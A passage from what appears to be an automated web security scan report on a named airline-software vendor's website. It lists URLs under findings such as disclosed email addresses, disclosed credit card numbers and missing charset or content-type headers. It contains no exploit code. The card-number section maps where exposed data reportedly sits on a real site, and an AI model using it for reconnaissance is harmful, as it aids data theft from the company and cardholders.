9.163. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_crew_manager

9.164. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_crew_qualifier

9.165. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_flight_explorer

9.166. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_flight_plan_manager

9.167. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_gate_manager

9.168. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_gate_planner

9.169. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_load_manager

9.170. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_movement_control

9.171. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_movement_manager

9.172. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_recovery_manager

9.173. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_roster_maker

9.174. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_staff_admin

9.175. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_staff_manager

9.176. http://www.sabreairlinesolutions.com/home/products_services/sabre_aircentre_staff_planner

9.177. http://www.sabreairlinesolutions.com/home/products_services/sabre_airport_data_intelligence

9.178. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_cargo_revenue_manager

9.179. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_codeshare_manager

9.180. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_fleet_manager

9.181. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_group_ecommerce

9.182. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_in-flight

9.183. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_revenue_accounting

9.184. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_revenue_manager

9.185. http://www.sabreairlinesolutions.com/home/products_services/sabre_community_portal

9.186. http://www.sabreairlinesolutions.com/home/products_services/sabre_emd_manager

9.187. http://www.sabreairlinesolutions.com/home/products_services/sabre_qik_analysis_system

9.188. http://www.sabreairlinesolutions.com/home/products_services/sabre_revenue_integrity

9.189. http://www.sabreairlinesolutions.com/home/products_services/sabresonic_check-in

9.190. http://www.sabreairlinesolutions.com/home/products_services/sabresonic_css

9.191. http://www.sabreairlinesolutions.com/home/products_services/sabresonic_inventory

9.192. http://www.sabreairlinesolutions.com/home/products_services/sabresonic_sell

9.193. http://www.sabreairlinesolutions.com/home/products_services/sabresonic_web

9.194. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community

9.195. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/

9.196. http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services

9.197. http://www.sabreairlinesolutions.com/home/products_services/services/delivery_and_customer_care

9.198. http://www.sabreairlinesolutions.com/home/products_services/technical_records_hub

9.199. http://www.sabreairlinesolutions.com/home/products_services/technology

9.200. http://www.sabreairlinesolutions.com/home/products_services/technology/

9.201. http://www.sabreairlinesolutions.com/home/products_services/technology/sabre_asx_airline_services_exchange

9.202. http://www.sabreairlinesolutions.com/home/products_services/technology/sabre_asx_airline_services_exchange/

9.203. http://www.sabreairlinesolutions.com/home/products_services/technology/software_as_a_service

9.204. http://www.sabreairlinesolutions.com/home/products_services/technology/software_as_a_service/

9.205. http://www.sabreairlinesolutions.com/home/products_services/travel_bank

9.206. http://www.sabreairlinesolutions.com/home/products_services/web_services

9.207. http://www.sabreairlinesolutions.com/home/search/

9.208. http://www.sabreairlinesolutions.com/home/search/show_results

9.209. http://www.sabreairlinesolutions.com/images/prettyPhoto/

9.210. http://www.sabreairlinesolutions.com/images/prettyPhoto/dark_rounded/

9.211. http://www.sabreairlinesolutions.com/images/prettyPhoto/dark_square/

9.212. http://www.sabreairlinesolutions.com/images/prettyPhoto/light_rounded/

9.213. http://www.sabreairlinesolutions.com/images/uploads/flash/

9.214. http://www.sabreairlinesolutions.com/images/uploads/releases/

9.215. http://www.sabreairlinesolutions.com/js/

10. Email addresses disclosed

10.1. http://www.sabreairlinesolutions.com/home/about

10.2. http://www.sabreairlinesolutions.com/home/about/complete_the_picture/

10.3. http://www.sabreairlinesolutions.com/home/about/copyright_and_trademark/

10.4. http://www.sabreairlinesolutions.com/home/about/executive_team/

10.5. http://www.sabreairlinesolutions.com/home/about/executive_team/greg_gilchrist

10.6. http://www.sabreairlinesolutions.com/home/about/executive_team/stephen_m._clampett

10.7. http://www.sabreairlinesolutions.com/home/about/executive_team/tom_klein

10.8. http://www.sabreairlinesolutions.com/home/about/media_press/

10.9. http://www.sabreairlinesolutions.com/home/about/privacy_policy/

10.10. http://www.sabreairlinesolutions.com/home/about/sitemap/

10.11. http://www.sabreairlinesolutions.com/home/about/the_as_advantage/

10.12. http://www.sabreairlinesolutions.com/home/ascend

10.13. http://www.sabreairlinesolutions.com/home/ascend/

10.14. http://www.sabreairlinesolutions.com/home/ascend/archive

10.15. http://www.sabreairlinesolutions.com/home/ascend/archive/

10.16. http://www.sabreairlinesolutions.com/home/ascend/contact

10.17. http://www.sabreairlinesolutions.com/home/ascend/contact/

10.18. http://www.sabreairlinesolutions.com/home/ascend/current_issue

10.19. http://www.sabreairlinesolutions.com/home/ascend/current_issue/

10.20. http://www.sabreairlinesolutions.com/home/ascend/error

10.21. http://www.sabreairlinesolutions.com/home/ascend/error/

10.22. http://www.sabreairlinesolutions.com/home/ascend/past_editions

10.23. http://www.sabreairlinesolutions.com/home/ascend/past_editions/

10.24. http://www.sabreairlinesolutions.com/home/ascend/subscribe

10.25. http://www.sabreairlinesolutions.com/home/ascend/subscribe/

10.26. http://www.sabreairlinesolutions.com/home/business_issues

10.27. http://www.sabreairlinesolutions.com/home/business_issues/

10.28. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management

10.29. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management/

10.30. http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations/

10.31. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues

10.32. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues/

10.33. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth

10.34. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth/

10.35. http://www.sabreairlinesolutions.com/home/contact

10.36. http://www.sabreairlinesolutions.com/home/contact/

10.37. http://www.sabreairlinesolutions.com/home/contact/airline_distribution

10.38. http://www.sabreairlinesolutions.com/home/contact/airline_distribution/

10.39. http://www.sabreairlinesolutions.com/home/contact/airports

10.40. http://www.sabreairlinesolutions.com/home/contact/airports/

10.41. http://www.sabreairlinesolutions.com/home/contact/media_relations

10.42. http://www.sabreairlinesolutions.com/home/contact/media_relations/

10.43. http://www.sabreairlinesolutions.com/home/contact/product_sales

10.44. http://www.sabreairlinesolutions.com/home/contact/product_sales/

10.45. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services

10.46. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services/

10.47. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation

10.48. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation/

10.49. http://www.sabreairlinesolutions.com/home/news_events

10.50. http://www.sabreairlinesolutions.com/home/news_events/

10.51. http://www.sabreairlinesolutions.com/home/news_events/event/2009_sabresonic_loyalty_user_conference

10.52. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference

10.53. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference2

10.54. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_aircentre_operations_enterprise_solution_user_workshop

10.55. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_airmax_group_manager_user_conference

10.56. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_developers_conference

10.57. http://www.sabreairlinesolutions.com/home/news_events/event/sabresonic_global_conference2

10.58. http://www.sabreairlinesolutions.com/home/news_events/events

10.59. http://www.sabreairlinesolutions.com/home/news_events/events/

10.60. http://www.sabreairlinesolutions.com/home/news_events/news

10.61. http://www.sabreairlinesolutions.com/home/news_events/news/

10.62. http://www.sabreairlinesolutions.com/home/products_services

10.63. http://www.sabreairlinesolutions.com/home/products_services/

10.64. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/

10.65. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/

10.66. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ecommerce/

10.67. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_technology/

10.68. http://www.sabreairlinesolutions.com/home/products_services/airports

10.69. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/images

10.70. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/my_list/

10.71. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_revenue/

10.72. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations

10.73. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/

10.74. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/aircentre_technology

10.75. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/aircentre_technology/

10.76. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost

10.77. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads

10.78. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/images/pdf_icon.gif

10.79. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/images

10.80. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/images/

10.81. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/manage_change

10.82. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list

10.83. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list/

10.84. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_crew

10.85. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_flight

10.86. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_maintenance

10.87. http://www.sabreairlinesolutions.com/home/products_services/product/agency_management

10.88. http://www.sabreairlinesolutions.com/home/products_services/product/agent_sales_report

10.89. http://www.sabreairlinesolutions.com/home/products_services/product/automated_exchange_and_refunds

10.90. http://www.sabreairlinesolutions.com/home/products_services/product/credit_suite

10.91. http://www.sabreairlinesolutions.com/home/products_services/product/electronic_ticketing

10.92. http://www.sabreairlinesolutions.com/home/products_services/product/multitask_manager

10.93. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_acars_manager

10.94. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_acars_manager/

10.95. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_airspace_flow_manager

10.96. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_airspace_flow_manager/

10.97. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_control

10.98. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_control/

10.99. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_manager

10.100. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_manager/

10.101. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_qualifier

10.102. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_qualifier/

10.103. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_explorer

10.104. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_explorer/

10.105. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_plan_manager

10.106. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_plan_manager/

10.107. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_gate_manager

10.108. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_gate_planner

10.109. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_load_manager

10.110. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_load_manager/

10.111. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_control

10.112. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_control/

10.113. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_manager

10.114. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_manager/

10.115. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_recovery_manager

10.116. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_recovery_manager/

10.117. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_roster_maker

10.118. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_admin

10.119. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_manager

10.120. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_planner

10.121. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airport_data_intelligence

10.122. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_cargo_revenue_manager

10.123. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_codeshare_manager

10.124. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fares_manager

10.125. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fleet_manager

10.126. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_group_ecommerce

10.127. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_community_portal

10.128. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/

10.129. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_revenue_integrity

10.130. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_revenue_integrity/

10.131. http://www.sabreairlinesolutions.com/home/products_services/product/technical_records_hub

10.132. http://www.sabreairlinesolutions.com/home/products_services/product/technical_records_hub/

10.133. http://www.sabreairlinesolutions.com/home/products_services/product/travel_bank

10.134. http://www.sabreairlinesolutions.com/home/products_services/product_index

10.135. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community

10.136. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/

10.137. http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services

10.138. http://www.sabreairlinesolutions.com/home/products_services/services/delivery_and_customer_care

10.139. http://www.sabreairlinesolutions.com/home/products_services/technology

10.140. http://www.sabreairlinesolutions.com/home/products_services/technology/

10.141. http://www.sabreairlinesolutions.com/home/products_services/technology/sabre_asx_airline_services_exchange

10.142. http://www.sabreairlinesolutions.com/home/products_services/technology/sabre_asx_airline_services_exchange/

10.143. http://www.sabreairlinesolutions.com/home/products_services/technology/software_as_a_service

10.144. http://www.sabreairlinesolutions.com/home/products_services/technology/software_as_a_service/

10.145. http://www.sabreairlinesolutions.com/home/search/

10.146. http://www.sabreairlinesolutions.com/home/search/show_results

10.147. http://www.sabreairlinesolutions.com/images/uploads/singapore_agenda.pdf

10.148. http://www.sabreairlinesolutions.com/js/DD_belatedPNG.js

10.149. http://www.sabreairlinesolutions.com/js/jquery.cookie.js

11. Credit card numbers disclosed

11.1. http://www.sabreairlinesolutions.com/home/contact/airline_distribution

11.2. http://www.sabreairlinesolutions.com/home/contact/airline_distribution/

11.3. http://www.sabreairlinesolutions.com/images/uploads/releases/5137-10546_Merch_Profile_FINAL2_021809_LR.pdf

11.4. http://www.sabreairlinesolutions.com/images/uploads/releases/flightplanning.pdf

11.5. http://www.sabreairlinesolutions.com/images/uploads/releases/loadplanning.pdf

11.6. http://www.sabreairlinesolutions.com/images/uploads/releases/operationsintergration.pdf

11.7. http://www.sabreairlinesolutions.com/images/uploads/singapore_agenda.pdf

12. HTML does not specify charset

12.1. http://www.sabreairlinesolutions.com/home

12.2. http://www.sabreairlinesolutions.com/home/about

12.3. http://www.sabreairlinesolutions.com/home/about/complete_the_picture/

12.4. http://www.sabreairlinesolutions.com/home/about/copyright_and_trademark/

12.5. http://www.sabreairlinesolutions.com/home/about/executive_team/

12.6. http://www.sabreairlinesolutions.com/home/about/executive_team/darren_rickey

12.7. http://www.sabreairlinesolutions.com/home/about/executive_team/ellen_ehrlich

12.8. http://www.sabreairlinesolutions.com/home/about/executive_team/gordon_locke

12.9. http://www.sabreairlinesolutions.com/home/about/executive_team/ilia_kostov

12.10. http://www.sabreairlinesolutions.com/home/about/executive_team/mark_silagy

12.11. http://www.sabreairlinesolutions.com/home/about/executive_team/stephen_m._clampett

12.12. http://www.sabreairlinesolutions.com/home/about/executive_team/tom_klein

12.13. http://www.sabreairlinesolutions.com/home/about/media_press/

12.14. http://www.sabreairlinesolutions.com/home/about/privacy_policy/

12.15. http://www.sabreairlinesolutions.com/home/about/sitemap/

12.16. http://www.sabreairlinesolutions.com/home/about/the_as_advantage/

12.17. http://www.sabreairlinesolutions.com/home/ascend

12.18. http://www.sabreairlinesolutions.com/home/contact

12.19. http://www.sabreairlinesolutions.com/home/news_events

12.20. http://www.sabreairlinesolutions.com/home/products_services/airline_distribution

12.21. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations

12.22. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads

12.23. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/

12.24. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images

12.25. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/pdf_icon.gif

12.26. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ecommerce

12.27. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/images

12.28. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/images/

12.29. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/images/pdf_icon.gif

12.30. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers

12.31. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers/

12.32. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_revenue

12.33. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_revenue/

12.34. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/my_list

12.35. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/my_list/

12.36. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/news

12.37. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/news/

12.38. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_loyalty

12.39. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_loyalty/

12.40. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_res

12.41. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_res/

12.42. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_technology

12.43. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_ticket

12.44. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_ticket/

12.45. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_user_experience

12.46. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_user_experience/

12.47. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning

12.48. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/

12.49. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/Sabre_AirVision_Market_Intelligence

12.50. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/Sabre_AirVision_Market_Intelligence/

12.51. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/airvision_technology

12.52. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/airvision_technology/

12.53. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_brand

12.54. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_brand/

12.55. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_profit

12.56. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_profit/

12.57. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads

12.58. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/

12.59. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/images

12.60. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/images/

12.61. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/images/pdf_icon.gif

12.62. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/images/

12.63. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/images/pdf_icon.gif

12.64. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/my_list

12.65. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network

12.66. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/

12.67. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_revenue

12.68. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/airport

12.69. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost/

12.70. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/

12.71. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/images/

12.72. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/images/pdf_icon.gif

12.73. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/manage_change/

12.74. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_crew/

12.75. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_flight/

12.76. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_maintenance/

12.77. http://www.sabreairlinesolutions.com/home/products_services/product/corporate_management

12.78. http://www.sabreairlinesolutions.com/home/products_services/product/developer_tool

12.79. http://www.sabreairlinesolutions.com/home/products_services/product/electronic_ticketing_for_third-party_ground_handling

12.80. http://www.sabreairlinesolutions.com/home/products_services/product/frequent_flyer_management

12.81. http://www.sabreairlinesolutions.com/home/products_services/product/gds_electronic_ticketing

12.82. http://www.sabreairlinesolutions.com/home/products_services/product/interact_interface

12.83. http://www.sabreairlinesolutions.com/home/products_services/product/interline_electronic_ticketing_hub

12.84. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_plan_manager

12.85. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_gate_manager

12.86. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_gate_planner

12.87. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_load_manager

12.88. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_control

12.89. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_manager

12.90. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_recovery_manager

12.91. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_roster_maker

12.92. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_admin

12.93. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_manager

12.94. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_planner

12.95. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airport_data_intelligence

12.96. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_cargo_revenue_manager

12.97. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_codeshare_manager

12.98. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fares_manager

12.99. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fleet_manager

12.100. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_group_ecommerce

12.101. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_group_manager

12.102. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight

12.103. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_network_manager

12.104. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_profit_essentials

12.105. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_profit_manager

12.106. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_revenue_accounting

12.107. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_revenue_manager

12.108. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_schedule_manager

12.109. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_slot_manager_iata

12.110. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_emd_manager

12.111. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_gds_display_analysis

12.112. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_qik_analysis_system

12.113. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager

12.114. http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_check-in

12.115. http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_inventory

12.116. http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_sell

12.117. http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_web

12.118. http://www.sabreairlinesolutions.com/home/products_services/product/web_services

12.119. http://www.sabreairlinesolutions.com/home/products_services/product_index/

12.120. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_fares_manager

12.121. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_network_manager

12.122. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_profit_essentials

12.123. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_profit_manager

12.124. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_schedule_manager

12.125. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_slot_manager_iata

12.126. http://www.sabreairlinesolutions.com/home/products_services/sabre_reaccommodation_manager

12.127. http://www.sabreairlinesolutions.com/images/uploads/

13. Content type incorrectly stated

13.1. http://www.sabreairlinesolutions.com/favicon.ico

13.2. http://www.sabreairlinesolutions.com/home

13.3. http://www.sabreairlinesolutions.com/home/about

13.4. http://www.sabreairlinesolutions.com/home/about/complete_the_picture/

13.5. http://www.sabreairlinesolutions.com/home/about/copyright_and_trademark/

13.6. http://www.sabreairlinesolutions.com/home/about/executive_team/

13.7. http://www.sabreairlinesolutions.com/home/about/executive_team/darren_rickey

13.8. http://www.sabreairlinesolutions.com/home/about/executive_team/ellen_ehrlich

13.9. http://www.sabreairlinesolutions.com/home/about/executive_team/gordon_locke

13.10. http://www.sabreairlinesolutions.com/home/about/executive_team/ilia_kostov

13.11. http://www.sabreairlinesolutions.com/home/about/executive_team/mark_silagy

13.12. http://www.sabreairlinesolutions.com/home/about/executive_team/stephen_m._clampett

13.13. http://www.sabreairlinesolutions.com/home/about/executive_team/tom_klein

13.14. http://www.sabreairlinesolutions.com/home/about/media_press/

13.15. http://www.sabreairlinesolutions.com/home/about/privacy_policy/

13.16. http://www.sabreairlinesolutions.com/home/about/sitemap/

13.17. http://www.sabreairlinesolutions.com/home/about/the_as_advantage/

13.18. http://www.sabreairlinesolutions.com/home/ascend

13.19. http://www.sabreairlinesolutions.com/home/contact

13.20. http://www.sabreairlinesolutions.com/home/news_events

13.21. http://www.sabreairlinesolutions.com/home/products_services/airline_distribution

13.22. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations

13.23. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads

13.24. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/

13.25. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images

13.26. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/pdf_icon.gif

13.27. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ecommerce

13.28. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/images

13.29. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/images/

13.30. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/images/pdf_icon.gif

13.31. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers

13.32. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers/

13.33. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_revenue

13.34. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_revenue/

13.35. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/my_list

13.36. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/my_list/

13.37. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/news

13.38. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/news/

13.39. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_loyalty

13.40. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_loyalty/

13.41. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_res

13.42. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_res/

13.43. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_technology

13.44. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_ticket

13.45. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_ticket/

13.46. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_user_experience

13.47. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_user_experience/

13.48. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning

13.49. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/

13.50. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/Sabre_AirVision_Market_Intelligence

